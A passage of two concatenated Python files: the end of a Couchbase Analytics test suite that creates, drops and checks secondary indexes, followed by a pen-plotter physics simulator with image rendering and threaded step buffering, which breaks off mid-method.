"Error msg not matching expected error msg")
def test_create_index_with_if_not_exists(self):
'''
Steps :
1. Create bucket in CBAS, create dataset
2. Create index
3. Again create an index with the same name using IF_NOT_EXISTS clause
4. Validate that there is no error
Author : Mihir Kamdar
Created date : 8/1/2017
'''
# Create Index
index_fields = ""
for index_field in self.index_fields:
index_fields += index_field + ","
index_fields = index_fields[:-1]
create_idx_statement = "create index {0} IF NOT EXISTS on {1}({2});".format(
self.index_name, self.cbas_dataset_name, index_fields)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name, self.index_fields,
self.cbas_dataset_name)[0])
# Create another index with same name
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name, self.index_fields,
self.cbas_dataset_name)[0])
def test_create_index_with_if_not_exists_different_fields(self):
'''
Steps :
1. Create bucket in CBAS, create dataset
2. Create index
3. Again create an index with the same name but with different fields using IF_NOT_EXISTS clause
4. Validate there is no error
5. The index definition should not change.
Author : Mihir Kamdar
Created date : 8/1/2017
'''
index_field1 = "city:string"
index_field2 = "abv:bigint"
# Create Index
create_idx_statement = "create index {0} IF NOT EXISTS on {1}({2});".format(
self.index_name, self.cbas_dataset_name, index_field1)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name, [index_field1],
self.cbas_dataset_name)[0])
# Create another index with same name
create_idx_statement = "create index {0} IF NOT EXISTS on {1}({2});".format(
self.index_name, self.cbas_dataset_name, index_field2)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
# The index definition should be based on the older field, it should not change
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name, [index_field1],
self.cbas_dataset_name)[0])
def test_multiple_composite_index_with_overlapping_fields(self):
'''
Steps :
1. Create bucket in CBAS, create dataset
2. Create index
3. Again create a composite index
4. Now create another composite index with some overlapping fields
5. Both the indexes should get created successfully
Author : Mihir Kamdar
Created date : 8/1/2017
'''
index_fields1 = ["city:string", "abv:bigint"]
index_fields2 = ["abv:bigint", "geo.lat:double"]
# Create Index
index_fields = ""
for index_field in index_fields1:
index_fields += index_field + ","
index_fields = index_fields[:-1]
create_idx_statement = "create index {0} IF NOT EXISTS on {1}({2});".format(
self.index_name + "1", self.cbas_dataset_name, index_fields)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name + "1", index_fields1,
self.cbas_dataset_name)[0])
# Create another composite index with overlapping fields
index_fields = ""
for index_field in index_fields2:
index_fields += index_field + ","
index_fields = index_fields[:-1]
create_idx_statement = "create index {0} IF NOT EXISTS on {1}({2});".format(
self.index_name + "2", self.cbas_dataset_name, index_fields)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name + "2", index_fields2,
self.cbas_dataset_name)[0])
statement = 'SELECT VALUE v FROM '+ self.cbas_dataset_name + ' v WHERE v.geo.lat > 1 AND v.abv > 2'
self.verify_index_used(statement, True, self.index_name)
def test_create_index_non_empty_dataset(self):
'''
Steps :
1. Create bucket in CBAS, create dataset, connect to the bucket, disconnect from bucket
2. Create index
3. Validate the index is created correctly
Author : Mihir Kamdar
Created date : 8/1/2017
'''
# Connect to Bucket
result = self.cbas_util.connect_to_bucket(cbas_bucket_name=
self.cbas_bucket_name,
cb_bucket_password=self.cb_bucket_password)
# Allow ingestion to complete
self.sleep(30)
# Disconnect from bucket
result = self.cbas_util.disconnect_from_bucket(cbas_bucket_name=
self.cbas_bucket_name)
# Create Index
index_fields = ""
for index_field in self.index_fields:
index_fields += index_field + ","
index_fields = index_fields[:-1]
create_idx_statement = "create index {0} on {1}({2});".format(
self.index_name, self.cbas_dataset_name, index_fields)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name, self.index_fields,
self.cbas_dataset_name)[0])
def test_create_index_with_bucket_connected(self):
'''
Steps :
1. Create bucket in CBAS, create dataset, connect to the bucket
2. Create index
3. Create index should fail.
4. Validate that the error msg is as expected
Author : Mihir Kamdar
Created date : 8/1/2017
'''
# Connect to Bucket
self.cbas_util.connect_to_bucket(cbas_bucket_name=
self.cbas_bucket_name,
cb_bucket_password=self.cb_bucket_password)
# Allow ingestion to complete
self.sleep(30)
# Create Index
index_fields = ""
for index_field in self.index_fields:
index_fields += index_field + ","
index_fields = index_fields[:-1]
create_idx_statement = "create index {0} on {1}({2});".format(
self.index_name, self.cbas_dataset_name, index_fields)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(self.cbas_util.validate_error_in_response(status, errors, self.expected_error))
def test_drop_index(self):
'''
Steps :
1. Create bucket in CBAS, create dataset
2. Create index
3. Validate the index is created correctly
4. Drop index
5. Validate that the index is dropped
Author : Mihir Kamdar
Created date : 8/1/2017
'''
# Create Index
index_fields = ""
for index_field in self.index_fields:
index_fields += index_field + ","
index_fields = index_fields[:-1]
create_idx_statement = "create index {0} on {1}({2});".format(
self.index_name, self.cbas_dataset_name, index_fields)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name, self.index_fields,
self.cbas_dataset_name)[0])
drop_idx_statement = "drop index {0}.{1};".format(
self.cbas_dataset_name, self.index_name)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
drop_idx_statement)
self.assertTrue(status == "success", "Drop Index query failed")
self.assertFalse(
self.cbas_util.verify_index_created(self.index_name, self.index_fields,
self.cbas_dataset_name)[0])
def test_drop_non_existing_index(self):
'''
Steps :
1. Create bucket in CBAS, create dataset
2. Drop a non-existing index without using IF_EXISTS clause
3. Validate that the error msg is as expected
4. Drop a non-existing index using IF_EXISTS clause
5. Validate there is no error
Author : Mihir Kamdar
Created date : 8/1/2017
'''
# Drop non-existing index without IF EXISTS
drop_idx_statement = "drop index {0}.{1};".format(
self.cbas_dataset_name, self.index_name)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
drop_idx_statement)
self.assertTrue(self.cbas_util.validate_error_in_response(status, errors, self.expected_error))
# Drop non-existing index with IF EXISTS
drop_idx_statement = "drop index {0}.{1} IF EXISTS;".format(
self.cbas_dataset_name, self.index_name)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
drop_idx_statement)
self.assertEqual(status, "success",
"Drop non existent index with IF EXISTS fails")
def test_drop_dataset_drops_index(self):
'''
Steps :
1. Create bucket in CBAS, create dataset
2. Create index
3. Validate the index is created correctly
4. Drop dataset
5. Validate that the index is also dropped
Author : Mihir Kamdar
Created date : 8/1/2017
'''
# Create Index
index_fields = ""
for index_field in self.index_fields:
index_fields += index_field + ","
index_fields = index_fields[:-1]
create_idx_statement = "create index {0} on {1}({2});".format(
self.index_name, self.cbas_dataset_name, index_fields)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name, self.index_fields,
self.cbas_dataset_name)[0])
# Drop dataset
self.cbas_util.drop_dataset(self.cbas_dataset_name)
# Check that the index no longer exists
self.assertFalse(
self.cbas_util.verify_index_created(self.index_name, self.index_fields,
self.cbas_dataset_name)[0])
def test_drop_non_empty_index(self):
'''
Steps :
1. Create bucket in CBAS, create dataset
2. Create index
3. Validate the index is created correctly
4. Connect dataset, disconnect dataset
5. Drop index
6. Validate that the index is dropped
Author : Mihir Kamdar
Created date : 8/1/2017
'''
# Create Index
index_fields = ""
for index_field in self.index_fields:
index_fields += index_field + ","
index_fields = index_fields[:-1]
create_idx_statement = "create index {0} on {1}({2});".format(
self.index_name, self.cbas_dataset_name, index_fields)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name, self.index_fields,
self.cbas_dataset_name)[0])
# Connect to Bucket
self.cbas_util.connect_to_bucket(cbas_bucket_name=
self.cbas_bucket_name,
cb_bucket_password=self.cb_bucket_password)
# Allow ingestion to complete
self.sleep(30)
# Disconnect from bucket
self.cbas_util.disconnect_from_bucket(cbas_bucket_name=
self.cbas_bucket_name)
drop_idx_statement = "drop index {0}.{1};".format(
self.cbas_dataset_name, self.index_name)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
drop_idx_statement)
self.assertTrue(status == "success", "Drop Index query failed")
self.assertFalse(
self.cbas_util.verify_index_created(self.index_name,
self.index_fields,
self.cbas_dataset_name)[0])
def _direct_client(self, server, bucket, timeout=30):
# CREATE SDK CLIENT
if self.sdk_client_type == "java":
try:
from sdk_client3 import SDKClient
scheme = "couchbase"
host = self.cluster.master.ip
if self.cluster.master.ip == "127.0.0.1":
scheme = "http"
host = "{0}:{1}".format(self.cluster.master.ip, self.cluster.master.port)
return SDKClient(scheme=scheme, hosts=[host], bucket=bucket,
password=self.cluster.master.rest_password)
except Exception, ex:
self.log.error("cannot load sdk client due to error {0}"
.format(str(ex)))
# USE MC BIN CLIENT WHEN NOT USING SDK CLIENT
return self.direct_mc_bin_client(server, bucket, timeout=timeout)
def test_index_population(self):
'''
Steps :
1. Upsert a document whose field value may or may not match the indexed field's type
2. Create a secondary index, connect the bucket and query by the indexed field
3. Verify whether the secondary index is used to serve the query, depending on the type match
'''
# Create Index
# to_verify=0
search_by = self.input.param("search_by", '')
exp_number = self.input.param("exp_number", 0)
not_fit_value = self.input.param("not_fit_value", '')
expected_status = self.input.param("status", 'success')
binary = self.input.param("binary", False)
index_used = self.input.param("index_used", False)
if ";" in str(not_fit_value):
not_fit_value = not_fit_value.split(';')
testuser = [{'id': self.cb_bucket_name, 'name': self.cb_bucket_name, 'password': 'password'}]
rolelist = [{'id': self.cb_bucket_name, 'name': self.cb_bucket_name, 'roles': 'admin'}]
self.add_built_in_server_user(testuser=testuser, rolelist=rolelist)
self.client = self._direct_client(self.cluster.master, self.cb_bucket_name)
k = 'test_index_population'
index_fields = ""
for index_field in self.index_fields:
index_fields += index_field + ","
index_fields = index_fields[:-1]
if binary:
self.client.upsert('utf16_doc', not_fit_value.encode('utf16'))
else:
if "." in index_fields.split(":")[0]:
self.client.upsert(k, {index_fields.split(":")[0].split(".")[0]:{index_fields.split(":")[0].split(".")[1] : not_fit_value}})
else:
self.client.upsert(k, {index_fields.split(":")[0] : not_fit_value})
self.client.close()
if index_fields.split(":")[1] == "string" and isinstance(not_fit_value,str) or \
index_fields.split(":")[1] == "double" and isinstance(not_fit_value,(float,int)) or \
index_fields.split(":")[1] == "bigint" and isinstance(not_fit_value,(float,int)):
index_used=True
create_idx_statement = "create index {0} on {1}({2});".format(
self.index_name, self.cbas_dataset_name, index_fields)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name, self.index_fields,
self.cbas_dataset_name)[0])
self.cbas_util.connect_to_bucket(cbas_bucket_name=
self.cbas_bucket_name,
cb_bucket_password=self.cb_bucket_password)
self.sleep(20)
if isinstance(search_by, basestring):
statement = 'SELECT count(*) FROM `{0}` where {1}="{2}"'.format(self.cbas_dataset_name, index_fields.split(":")[0], search_by)
else:
statement = 'SELECT count(*) FROM `{0}` where {1}={2}'.format(self.cbas_dataset_name,
index_fields.split(":")[0], search_by)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
statement)
self.assertEquals(status, "success")
self.assertEquals(errors, None)
self.assertEquals(results, [{'$1': exp_number}])
if isinstance(not_fit_value,str):
statement = 'SELECT count(*) FROM `{0}` where {1}="{2}"'.format(self.cbas_dataset_name,
index_fields.split(":")[0], not_fit_value)
else:
statement = 'SELECT count(*) FROM `{0}` where {1}={2}'.format(self.cbas_dataset_name,
index_fields.split(":")[0], not_fit_value)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
statement)
self.assertEquals(status, expected_status)
if status == 'success':
self.assertEquals(errors, None)
self.assertEquals(results, [{'$1': 1}])
self.log.info("Verify whether statement %s used index or not. Indexed: %s"%(statement,index_fields))
self.verify_index_used(statement, index_used, self.index_name)
# https://issues.couchbase.com/browse/MB-25646
# https://issues.couchbase.com/browse/MB-25657
def test_index_population_thread(self):
to_verify = 0
index_used = self.input.param("index_used", False)
def update_data(client, index_fields):
for _ in xrange(100):
if index_fields.split(":")[-1] == 'double':
not_fit_value = random.choice([False, "sdfs", 11111])
elif index_fields.split(":")[-1] == 'string':
not_fit_value = random.choice([False, 11111, 36.6])
elif index_fields.split(":")[-1] == 'bigint':
not_fit_value = random.choice([False, "sdfs", 36.6])
perc = random.randrange(0, 100)
if perc > 75:
# 25% with binary data
# client.upsert('utf16_doc', str(not_fit_value).encode('utf16'), format=FMT_BYTES)
client.upsert(k, {index_fields.split(":")[0]: not_fit_value})
else:
# 10% field removed
client.upsert(k, {index_fields.split(":")[0] + "_NEW_FIELD": not_fit_value})
# Create Index
search_by = self.input.param("search_by", '')
exp_number = self.input.param("exp_number", 0)
not_fit_value = self.input.param("not_fit_value", '')
expected_status = self.input.param("status", 'success')
if ";" in not_fit_value:
not_fit_value = not_fit_value.split(';')
testuser = [{'id': self.cb_bucket_name, 'name': self.cb_bucket_name, 'password': 'password'}]
rolelist = [{'id': self.cb_bucket_name, 'name': self.cb_bucket_name, 'roles': 'admin'}]
self.add_built_in_server_user(testuser=testuser, rolelist=rolelist)
self.client = self._direct_client(self.cluster.master, self.cb_bucket_name)
k = 'test_index_population_thread'
index_fields = ""
for index_field in self.index_fields:
index_fields += index_field + ","
index_fields = index_fields[:-1]
create_idx_statement = "create index {0} on {1}({2});".format(
self.index_name, self.cbas_dataset_name, index_fields)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name, self.index_fields,
self.cbas_dataset_name)[0])
self.cbas_util.connect_to_bucket(cbas_bucket_name=
self.cbas_bucket_name,
cb_bucket_password=self.cb_bucket_password)
self.sleep(10)
d = threading.Thread(name='daemon', target=update_data, args=(self.client, index_fields,))
d.setDaemon(True)
d.start()
for i in xrange(10):
if isinstance(search_by, basestring):
statement = 'SELECT count(*) FROM `{0}` where {1}="{2}"'.format(self.cbas_dataset_name,
index_fields.split(":")[0], search_by)
else:
statement = 'SELECT count(*) FROM `{0}` where {1}={2}'.format(self.cbas_dataset_name,
index_fields.split(":")[0], search_by)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
statement)
self.assertEquals(status, "success")
self.assertEquals(errors, None)
self.assertEquals(results, [{'$1': exp_number}])
if isinstance(not_fit_value,str):
statement = 'SELECT count(*) FROM `{0}` where {1}="{2}"'.format(self.cbas_dataset_name,
index_fields.split(":")[0], not_fit_value)
else:
statement = 'SELECT count(*) FROM `{0}` where {1}={2}'.format(self.cbas_dataset_name,
index_fields.split(":")[0], not_fit_value)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
statement)
self.assertEquals(status, expected_status)
if status == 'success':
self.assertEquals(errors, None)
self.assertEquals(results, [{'$1': 0}])
self.log.info("Verify whether statement %s used index or not. Indexed: %s"%(statement,index_fields))
self.verify_index_used(statement, index_used, self.index_name)
self.client.close()
def test_index_population_where_statements(self):
exp_number = self.input.param("exp_number", 0)
where_statement = self.input.param("where_statement", '').replace('_EQ_', '=')
index_used = self.input.param("index_used", False)
testuser = [{'id': self.cb_bucket_name, 'name': self.cb_bucket_name, 'password': 'password'}]
rolelist = [{'id': self.cb_bucket_name, 'name': self.cb_bucket_name, 'roles': 'admin'}]
self.add_built_in_server_user(testuser=testuser, rolelist=rolelist)
index_fields = ""
for index_field in self.index_fields:
index_fields += index_field + ","
index_fields = index_fields[:-1]
create_idx_statement = "create index {0} on {1}({2});".format(
self.index_name, self.cbas_dataset_name, index_fields)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name, self.index_fields,
self.cbas_dataset_name)[0])
self.cbas_util.connect_to_bucket(cbas_bucket_name=
self.cbas_bucket_name,
cb_bucket_password=self.cb_bucket_password)
self.sleep(20)
statement = 'SELECT count(*) FROM `{0}` where {1};'.format(self.cbas_dataset_name, where_statement)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
statement)
self.assertEquals(status, "success")
self.assertEquals(errors, None)
self.assertEquals(results, [{'$1': exp_number}])
self.log.info("Verify whether statement %s used index or not. Indexed: %s"%(statement,index_fields))
self.verify_index_used(statement, index_used, self.index_name)
def test_index_population_joins(self):
exp_number = self.input.param("exp_number", 0)
self.index_name2 = self.input.param('index_name2', None)
self.index_fields2 = self.input.param('index_fields2', None)
if self.index_fields2:
self.index_fields2 = self.index_fields2.split("-")
statement = self.input.param("statement", '').replace('_EQ_', '=').replace('_COMMA_', ',')
testuser = [{'id': self.cb_bucket_name, 'name': self.cb_bucket_name, 'password': 'password'}]
rolelist = [{'id': self.cb_bucket_name, 'name': self.cb_bucket_name, 'roles': 'admin'}]
self.add_built_in_server_user(testuser=testuser, rolelist=rolelist)
index_fields = ""
for index_field in self.index_fields:
index_fields += index_field + ","
index_fields = index_fields[:-1]
create_idx_statement = "create index {0} on {1}({2});".format(
self.index_name, self.cbas_dataset_name, index_fields)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name, self.index_fields,
self.cbas_dataset_name)[0])
index_fields2 = ""
for index_field in self.index_fields2:
index_fields2 += index_field + ","
index_fields2 = index_fields2[:-1]
create_idx_statement = "create index {0} on {1}({2});".format(
self.index_name2, self.cbas_dataset_name, index_fields2)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(
self.cbas_util.verify_index_created(self.index_name2, self.index_fields2,
self.cbas_dataset_name)[0])
self.cbas_util.connect_to_bucket(cbas_bucket_name=
self.cbas_bucket_name,
cb_bucket_password=self.cb_bucket_password)
self.sleep(20)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
statement)
self.assertEquals(status, "success")
self.assertEquals(errors, None)
self.assertEquals(len(results), exp_number)
# https://issues.couchbase.com/browse/MB-25695
def test_index_metadata(self):
self.buckets = [Bucket(name="beer-sample")]
self.perform_doc_ops_in_all_cb_buckets("create", start_key=0, end_key=100000)
index_fields = ""
for index_field in self.index_fields:
index_fields += index_field + ","
index_fields = index_fields[:-1]
create_idx_statement = "create index {0} on {1}({2});".format(
self.index_name, self.cbas_dataset_name, index_fields)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.cbas_util.connect_to_bucket(cbas_bucket_name=
self.cbas_bucket_name,
cb_bucket_password=self.cb_bucket_password)
self.cbas_util.wait_for_ingestion_complete([self.cbas_dataset_name], 107303)
statement = 'SELECT count(*) FROM `{0}`'.format(self.cbas_dataset_name)
#
_, result = self.cbas_util.verify_index_created(self.index_name, self.index_fields,
self.cbas_dataset_name)
self.assertEquals(result[0]['Index']['DatasetName'], self.cbas_dataset_name)
self.assertEquals(result[0]['Index']['DataverseName'], 'Default')
self.assertEquals(result[0]['Index']['IndexName'], self.index_name)
self.assertEquals(result[0]['Index']['IndexStructure'], 'BTREE')
self.assertEquals(result[0]['Index']['IsPrimary'], False)
self.assertEquals(result[0]['Index']['PendingOp'], 0)
self.assertEquals(result[0]['Index']['SearchKey'], [index_field.split(":")[:-1]])
self.assertEquals(result[0]['Index']['SearchKeyType'], index_field.split(":")[1:])
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
statement)
self.assertEquals(status, "success")
self.assertEquals(errors, None)
self.assertEquals(results, [{'$1': 107303}])
self.cbas_util.disconnect_from_bucket(cbas_bucket_name=
self.cbas_bucket_name)
drop_idx_statement = "drop index {0}.{1};".format(self.cbas_dataset_name, self.index_name)
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
drop_idx_statement)
_, result = self.cbas_util.verify_index_created(self.index_name, self.index_fields,
self.cbas_dataset_name)
self.assertEquals(result, [])
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(
statement)
self.assertEquals(status, "success")
self.assertEquals(errors, None)
self.assertEquals(results, [{'$1': 107303}])
def test_index_on_nested_fields_same_object(self):
index_fields = ["geo.lon:double", "geo.lat:double"]
create_idx_statement = "create index {0} IF NOT EXISTS on {1}({2});".format(self.index_name, self.cbas_dataset_name, ",".join(index_fields))
status, metrics, errors, results, _ = self.cbas_util.execute_statement_on_cbas_util(create_idx_statement)
self.assertTrue(status == "success", "Create Index query failed")
self.assertTrue(self.cbas_util.verify_index_created(self.index_name, index_fields, self.cbas_dataset_name)[0])
statement = 'SELECT VALUE v FROM '+ self.cbas_dataset_name + ' v WHERE v.geo.lon > 1 AND v.geo.lat > 2'
self.verify_index_used(statement, True, self.index_name)
|
plotter_simulator.py
|
import plotter_controller
import threading
import random
import time
import PIL.Image
import PIL.ImageDraw
import numpy as np
import sys
import step_file_data_provider
import math
class PlotterSimulator:
def __init__(self, step_time, phys_time, image_output_dir=None, save_stats=True):
self.image_time_step = 1.0 / 60
self.image_size = (600,600)
self.image_scale = 100
self.image_center_offset = (0,0)
self.image_output_dir = image_output_dir
self.drawn_image = None
self.step_time = step_time
self.phys_time = phys_time
#some physics constants
self.x_mass = 1
self.y_mass = 1
self.step_size = 0.001
self.k_x = 600 #The spring stiffness
self.k_y = 600 #The spring stiffness
self.c_x = 20
self.c_y = 20
self.save_stats = save_stats
self.stats = {}
self.clearStats()
#actual state of the object
self.state = []
self.effector_pos = (0,0)
self.effector_velocity = (0,0)
self.logical_pos = (0,0)
self.current_time = 0
self.current_phys_time = 0
self.step_count = 0
self.current_image_time = 0
self.image_count = 0
def getVelocity(self):
x_vel = self.effector_velocity[0]
y_vel = self.effector_velocity[1]
return math.sqrt((x_vel**2) + (y_vel**2))
def clearStats(self):
self.stats.clear()
self.stats = {
'max_force_x_abs':0,
'max_force_y_abs':0,
'max_force_x':0,
'max_force_y':0,
'min_force_x':0,
'min_force_y':0,
'max_velocity_x':0,
'max_velocity_y':0,
'min_velocity_x':0,
'min_velocity_y':0
}
def getStats(self):
return self.stats
def pushState(self):
this_state = {
'effector_pos':self.effector_pos,
'effector_velocity':self.effector_velocity,
'logical_pos':self.logical_pos,
'current_time':self.current_time,
'current_phys_time':self.current_phys_time,
'step_count':self.step_count,
'current_image_time':self.current_image_time,
'image_count':self.image_count
}
self.state.append(this_state)
def popState(self):
if(len(self.state) <= 0):
raise Exception("No state pop.")
else:
this_state = self.state.pop()
self.effector_pos = this_state['effector_pos']
self.effector_velocity = this_state['effector_velocity']
self.logical_pos = this_state['logical_pos']
self.current_time = this_state['current_time']
self.current_phys_time = this_state['current_phys_time']
self.step_count = this_state['step_count']
self.current_image_time = this_state['current_image_time']
self.image_count = this_state['image_count']
def saveImage(self, draw=False):
if(self.drawn_image is None and self.image_output_dir):
self.drawn_image = PIL.Image.new("RGBA", self.image_size)
while(self.current_phys_time > self.current_image_time and self.image_output_dir):
effector_draw_x = (self.effector_pos[0] * self.image_scale) + self.image_center_offset[0]
effector_draw_y = (self.effector_pos[1] * self.image_scale) + self.image_center_offset[1]
logical_draw_x = (self.logical_pos[0] * self.image_scale) + self.image_center_offset[0]
logical_draw_y = (self.logical_pos[1] * self.image_scale) + self.image_center_offset[1]
if(draw):
drawer = PIL.ImageDraw.Draw(self.drawn_image)
drawer.point((effector_draw_x, effector_draw_y), fill=(255, 255, 255, 255))
del drawer
img = self.drawn_image.copy()
drawer = PIL.ImageDraw.Draw(img)
drawer.line([effector_draw_x, effector_draw_y, effector_draw_x, effector_draw_y], fill=(255,0,0,255))
drawer.line([logical_draw_x, logical_draw_y, logical_draw_x, logical_draw_y], fill=(0,0,255,255))
drawer.line([effector_draw_x, effector_draw_y, logical_draw_x, logical_draw_y], fill=(0,255,0,255))
drawer.text((0,0),"%.5f"%(self.current_image_time), fill=(255,255,255,255))
del drawer
slash = '' if self.image_output_dir.endswith('/') else '/'
file_name = self.image_output_dir + slash + "%05d.png"%(self.image_count)
print("Saving image "+str(file_name))
img.save(file_name, "PNG")
self.current_image_time += self.image_time_step
self.image_count += 1
def stepPhysics(self, draw=False):
while(self.current_phys_time < self.current_time):
offset_x = self.logical_pos[0] - self.effector_pos[0]
offset_y = self.logical_pos[1] - self.effector_pos[1]
#These are actually two separate systems, since the plotter's actuators form an independent x-y pair.
force_x = (offset_x * self.k_x) - (self.c_x * self.effector_velocity[0])
force_y = (offset_y * self.k_y) - (self.c_y * self.effector_velocity[1])
acceleration_x = force_x / self.x_mass # Don't include time as it's not a motion formula
acceleration_y = force_y / self.y_mass # Don't include time as it's not a motion formula
velocity_x = self.effector_velocity[0] + (acceleration_x * self.phys_time) #Include time as it's a motion formula
velocity_y = self.effector_velocity[1] + (acceleration_y * self.phys_time) #Include time as it's a motion formula
movement_x = self.effector_pos[0] + (velocity_x * self.phys_time)
movement_y = self.effector_pos[1] + (velocity_y * self.phys_time)
self.effector_velocity = (velocity_x, velocity_y)
self.effector_pos = (movement_x, movement_y)
self.saveImage(draw)
if(self.save_stats):
self.stats['max_force_x_abs'] = max(abs(force_x), self.stats['max_force_x_abs'])
self.stats['max_force_y_abs'] = max(abs(force_y), self.stats['max_force_y_abs'])
self.stats['max_force_x'] = max(force_x, self.stats['max_force_x'])
self.stats['max_force_y'] = max(force_y, self.stats['max_force_y'])
self.stats['min_force_x'] = min(force_x, self.stats['min_force_x'])
self.stats['min_force_y'] = min(force_y, self.stats['min_force_y'])
self.current_phys_time += self.phys_time
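# The loop above integrates a per-axis spring/damper model with semi-implicit Euler
# (velocity is updated first, then position), using dt = self.phys_time:
#   F      = k * (x_logical - x_effector) - c * v
#   v_next = v + (F / m) * dt
#   x_next = x + v_next * dt
# where k, c and m are the constants set in __init__ (k_x/k_y, c_x/c_y, x_mass/y_mass).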
def step(self, step):
x_diff = 0
y_diff = 0
if(step.x_step == plotter_controller.StepDirection.FORWARD):
x_diff += 1
elif(step.x_step == plotter_controller.StepDirection.BACKWARDS):
x_diff -= 1
if(step.y_step == plotter_controller.StepDirection.FORWARD):
y_diff += 1
elif(step.y_step == plotter_controller.StepDirection.BACKWARDS):
y_diff -= 1
new_pos_x = self.logical_pos[0] + (x_diff * self.step_size)
new_pos_y = self.logical_pos[1] + (y_diff * self.step_size)
self.logical_pos = (new_pos_x, new_pos_y)
self.current_time += self.step_time
self.stepPhysics(draw=step.draw_value > 0)
self.step_count += 1
class PlotterSimulatorController(plotter_controller.PlotterController):
def __init__(self, step_data, step_time=0.001, buffer_size=1024, image_output_dir=None):
super(PlotterSimulatorController, self).__init__(step_data, step_time)
self.effector_pos = (0,0)
self.stepper_thread = None
self.data_thread = None
self.simulator = PlotterSimulator(step_time, step_time / 10, image_output_dir=image_output_dir)
self.buffer_size = buffer_size
self.load_buffer = []
self.consume_buffer = []
self.buffers = []
self.has_data = True
def wait(self):
self.stepper_thread.join()
self.data_thread.join()
#Buffer size should be large enough to handle latencies in the system.
def stepThreadFunc(self):
while(self.has_data):
#wait for data
#print(self.has_data, self.consume_buffer, self.load_buffer)
while(self.has_data and len(self.consume_buffer) <= 0):
time.sleep(0)
#print(self.consume_buffer, self.load_buffer)
start_time = time.time()
step_index = 0
while(len(self.consume_buffer) > 0):
step = self.consume_buffer.pop(0)
self.simulator.step(step)
step_index += 1
current_time = time.time()
next_step_time = start_time + ((step_index)*self.step_time)
sleep_time = max(next_step_time - current_time, 0)
time.sleep(sleep_time)
def dataThreadFunc(self):
while(self.step_data.hasData()):
step = self.step_data.getStep()
self.load_buffer.append(step)
if(len(self.load_buffer) >= self.buffer_size or not self.step_data.hasData()):
#Wait for consume buffer to empty
while(len(self.consume_buffer) > 0):
time.sleep(0)
#And now swap the buffers
temp_buffer = self.load_buffer
self.load_buffer = self.consume_buffer
self.consume_buffer = temp_buffer
time.sleep(0)
self.has_data = False
def start(self):
self.stepper_thread = threading.Thread(target=self.stepThreadFunc)
self.data_thread = threading.Thread(target=self.dataThreadFunc)
self.stepper_thread.start()
self.data_thread.start()
class RandomDataProvider(plotter_controller.StepDataProvider):
def __init__(self, number_of_data=1):
self.data_left = number_of_data
def getStep(self):
if(self.data_left <= 0):
raise Exception("Program crashed as the data provider is out of data")
else:
x_step = random.choice(list(plotter_controller.StepDirection))
y_step = random.choice(list(plotter_controller.StepDirection))
self.data_left -= 1
